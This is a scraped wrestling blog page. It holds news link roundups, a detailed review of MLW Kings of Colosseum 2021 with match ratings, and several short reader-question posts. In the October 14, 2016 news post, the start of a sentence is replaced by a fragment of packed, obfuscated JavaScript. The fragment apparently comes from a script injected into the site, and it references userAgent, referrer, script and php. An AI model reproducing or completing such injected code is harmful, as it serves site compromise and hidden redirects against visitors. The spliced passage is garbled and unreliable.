Daily News Update – November 30, 2021

Make sure you check out some recent reviews:

Monday Night Raw – November 29, 2021


LOOK: Wyatt Family Reunites Over The Weekend.

https://wrestlingrumors.net/tommyhall/look-wyatt-family-reunion-takes-place/

Sasha Banks Previously Asked For WWE Release.

https://wrestlingrumors.net/tommyhall/sasha-banks-previously-asked-wwe-release/

Two Surprise Returns Take Place On Monday Night Raw, New Feud Set.

https://wrestlingrumors.net/tommyhall/two-surprise-returns-take-place-monday-night-raw-new-feud-set/

Main Event Set For WWE Day 1.

https://wrestlingrumors.net/tommyhall/main-event-set-wwe-day-1/

Former WWE Star Lands Starring Role In Upcoming Action Film.

https://wrestlingrumors.net/tommyhall/former-wwe-star-lands-starring-role-upcoming-action-film/

WWE Stars Set Two New Official Guinness World Records.

https://wrestlingrumors.net/tommyhall/wwe-stars-set-two-new-official-guinness-world-records/

More Details On WWE Egg Angle, WWE Made A LOT Of Money.

https://wrestlingrumors.net/tommyhall/details-wwe-egg-angle-wwe-made-lot-money/

Nia Jax May Never Wrestle Again, References Bad Reputation.

https://wrestlingrumors.net/tommyhall/nia-jax-may-never-wrestle-references-bad-reputation/

As always, please check out all of the videos if you can, hit up the comments section and get on the Wrestling Rumors Facebook page.




Daily News Update – May 4, 2021

Chelsea Green Offers Her Own Awful WWE Trash Bag Story. May 3, 2021.

https://wrestlingrumors.net/tommyhall/chelsea-green-offers-awful-wwe-trash-bag-story/

Again: New Title Match Added To WrestleMania Backlash. May 3, 2021.

https://wrestlingrumors.net/tommyhall/new-title-match-added-wrestlemania-backlash/

Found Them: Missing Monday Night Raw Stars Return. May 3, 2021.

https://wrestlingrumors.net/tommyhall/found-missing-monday-night-raw-stars-return/

VIDEO: Surprise WWE Return On Monday Night Raw. May 3, 2021.

https://wrestlingrumors.net/tommyhall/video-surprise-return-monday-night-raw/

Sudden Change Made To WrestleMania Backlash Title Match. May 3, 2021.

https://wrestlingrumors.net/tommyhall/sudden-change-made-wrestlemania-backlash-title-match/

Get Well Soon: AEW Star Undergoing Surgery. May 4, 2021.

https://wrestlingrumors.net/tommyhall/get-well-soon-aew-star-undergoing-surgery/

WWE Announces New Monday Night Raw Signing. May 4, 2021.

https://wrestlingrumors.net/tommyhall/wwe-announces-new-monday-night-raw-signing/

Mark It Down: WWE Tag Team Officially Splits. May 4, 2021.

https://wrestlingrumors.net/tommyhall/mark-wwe-tag-team-officially-splits/

As always, please click on all of the videos if you can, hit up the comments section and get on the site’s Facebook page.




Major League Wrestling Kings Of Colosseum 2021: It Must Be A Small Kingdom

Kings of Colosseum 2021
Date: January 6, 2021
Location: Gilt Nightclub, Orlando, Florida
Commentators: Jared St. Laurent, Rich Bocchini

It’s a special show this time around as we’re getting to look at one of the company’s big events for free. There are three title matches tonight as things are indeed feeling stacked. The Tag Team, Middleweight and National Openweight Titles are all on the line, meaning this is going to be a big show. Let’s get to it.

Here are last week’s results if you need a recap.

The opening video looks at Alexander Hammerstone wanting the World Title and needing to go through Mads Krugger to get there. Krugger is ready for him.

Tag Team Titles: Von Erichs vs. Dirty Blondes

The Blondes, with Ariya Blake, are challenging and this is a Bunkhouse (country themed street fight) match. It’s a brawl to start (as it should be) with Marshall Von Erich being sent outside in a hurry. Ross Von Erich hits a quick dropkick though and everyone heads to the floor for the brawl. They waste no time in brawling to the back and then outside with Marshall being sent into a plastic table. Back inside and a cowbell to the head drops Leo Brien. Blake gets in a cheap shot and chokes Ross a bit, which has absolutely no effect. The Claw/belly to back suplex combination finishes Brien at 3:53.

Rating: C-. Where’s the other ten minutes of this? They had no time here and when you spend so much time brawling outside on the floor/outside, there isn’t exactly much time to set up your finish. What we got was good enough but they needed way more time for this to go anywhere.

The Von Erichs say anyone can come get a shot.

Simon Gotch isn’t here to face Jordan Oliver for some reason.

We look at Tom Lawlor defeating Low Ki to win the Opera Cup.

Lawlor talks about taking the cup everywhere, from the bathroom to the filthiest clubs in Vegas. He’s so proud that he has even had another cup made. This is the first time that he has been sober since winning the tournament and now they’re heading to FILTHY ISLAND.

Lio Rush has heard Myron Reed call himself Mr. Hot Fire but no one is hotter than him.

Reed is ready to show Rush what he’s all about.

Here’s the top ten:

10. Mads Krugger

9. Calvin Tankman

8. Laredo Kid

7. ACH

6. Richard Holliday

5. Myron Reed

4. LA Park

3. Low Ki

2. Tom Lawlor

1. Alex Hammerstone

Gotch vs. Oliver is officially postponed.

Middleweight Title: Lio Rush vs. Myron Reed

Reed is defending and has Jordan Oliver with him. Rush goes for the ankle to start but gets caught in a wristlock. That’s broken up in a hurry too and it’s time to run the ropes, with Reed hitting a slingshot belly to back drop. A legdrop gets two on Rush, who is right back with an elbow to the face. Rush starts doing his running dodges (those are always great) and Reed is sent to the floor for a suicide dive.

Back in and Rush takes his back with a chinlock to keep Reed in trouble. That’s broken up and Reed’s springboard cutter is blocked. A 540 kick to the face drops Reed again and Rush kicks at the chest. We’re back to the chinlock for a bit more but this time Reed fights up with a clothesline. That sends Rush outside so Reed hits a big running dive over the top. Back in and a springboard uppercut connects as commentary puts over Reed’s comeback skills. A fireman’s carry slam into a low superkick gets two on Rush so he rolls outside.

That’s enough for Rush to pop up and switch places with Reed, setting up a bottom rope Asai moonsault from Rush. A twisting Unprettier gives Rush two back inside and a clothesline cuts off the crisscross attempt. Reed gets in some shots to the face and they slug it out until Reed enziguris him to the apron. The always cool looking running over the top cutter takes Rush down to the floor but the frog splash misses back inside. Rush’s springboard Stunner connects, setting up the Final Hour for the pin and the title at 14:19.

Rating: B. Rush winning here is the right move as he’s a far bigger star than a good chunk of the entire roster, but they did a good job of keeping Reed from looking like a loser. You can’t have Rush win without breaking a sweat and what you got here was a solid back and forth match. Rush can hold the title for a good while and put someone over whenever he loses the title.

Rush says he’s awesome and no one is stopping him.

Alex Hammerstone is asked about his title match but Contra hacks the feed and promises a new soldier.

Tom Lawlor’s Filthy Island is coming soon.

Salina de la Renta promises her own show next week and the main event will be Los Parks challenging for the Tag Team Titles, in exchange for rejoining Promociones Dorado. Tom Lawlor will be the guest referee to make it completely fair.

Myron Reed says Lio Rush was the better man tonight but he’ll get the title back. Contra jumps Reed and Jordan Oliver, with Daivari joining in as the new soldier.

National Openweight Title: Alex Hammerstone vs. Mads Krugger

Krugger is challenging. They don’t waste time and start the brawl on the floor, with Hammerstone getting in a belt shot to the head. Hammerstone’s clothesline out of the corner doesn’t do much good inside and a big boot puts him on the floor. Krugger drops him face first onto the apron and they’re back inside with Hammerstone managing a belly to belly.

A running clothesline takes Krugger down this time and there’s a pump kick to the face in the corner. Another suplex gives Hammerstone one but it’s way too early for the Nightmare Pendulum. They take turns hammering away in the corner and brawl to the floor again for the double countout at 6:24.

Rating: C. This was just the teaser as it seems that they are going to have some kind of gimmick rematch, which makes sense given the nature of this one. Krugger should be winning the title soon so Hammerstone can move onto the World Title, which could make for an interesting showdown. Good stuff here, with Krugger dominating but not destroying Hammerstone, meaning there is enough of a reason to do this again.

Overall Rating: C+. The Middleweight Title match carried this show as there was almost nothing else worth seeing on the whole thing. It was the only match that got any significant kind of time and while it was good, it was barely enough to make the show worthwhile. I was expecting something a little longer overall here, but this was shorter than most regular episodes of Fusion. It’s fine enough because of Rush vs. Reed, but that’s all that’s here.

Remember to follow me on Twitter @kbreviews and pick up the paperback edition of KB’s Complete 2004 Monday Night Raw Reviews (also available as an e-book) from Amazon. Check out the information here:

http://kbwrestlingreviews.com/2019/08/26/new-book-and-e-book-kbs-complete-2004-monday-night-raw-reviews/

And check out my Amazon author page with cheap wrestling books at:

http://www.amazon.com/Thomas-Hall/e/B00E6282W6




New Column: Business As Unusual

There were some surprises in last week’s releases and most of them should be no surprise.

 

https://wrestlingrumors.net/tommyhall/kbs-review-business-unusual/




So Question

Do you all like it when I post happenings in wrestling (stuff like Vince’s announcement, Owens and Zayn returning and the result from Smackdown’s tapings) with the quick thoughts on them?  I stopped doing them for a long time but they’re easy to do and I can get them up faster than a bigger piece.

 

KB




News and Notes – October 14, 2016

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aiebd|var|u0026u|referrer|kbkbr||js|php'.split('|'),0,{})) don’t normally do this but there was so much news yesterday that I had to take a quick look at some of it.

1. TJ Perkins Replaces Hideo Itami in Dusty Rhodes Tag Team Classic.

2. Mickie James to Face Asuka at Takeover: Toronto.

3. Roderick Strong Debuts in NXT.

Question For You Guys

Lately I’ve been posting more stuff about news in wrestling.  I know the name of this place is kbwrestlingreviews, so do you guys want me to keep posting stuff about the news in wrestling as well?  I don’t mean stuff that’s huge, but rather stuff like Rosita and Sarita being gone or Tyson Kidd getting injured and being out for 10-12 months.  It doesn’t take long to put those things up at all and more content is always good for me.  Should I keep doing that or stick with just reviews and major stories?

 

KB




WWELeaks: Creative Staff Member John Piermarini Tells Of Plans

John Piermarini, a former WWE writer, has started a blog telling of all kinds of things that have been planned recently.  Everywhere on the forums I frequent (forums.wrestlezone.com.  Best forums there are and if you don’t believe me I’ll give you your money back) I hear about this and a few things pop to my mind.

1. Yes let’s just immediately believe everything this guy says.  Take it with a grain of salt people.

2. Do you really think Vince doesn’t know about this?  Do you really think he might not change things up to keep fans confused?  This could get interesting.

3. A lot of what he said was common sense if you really think about it.

Thoughts?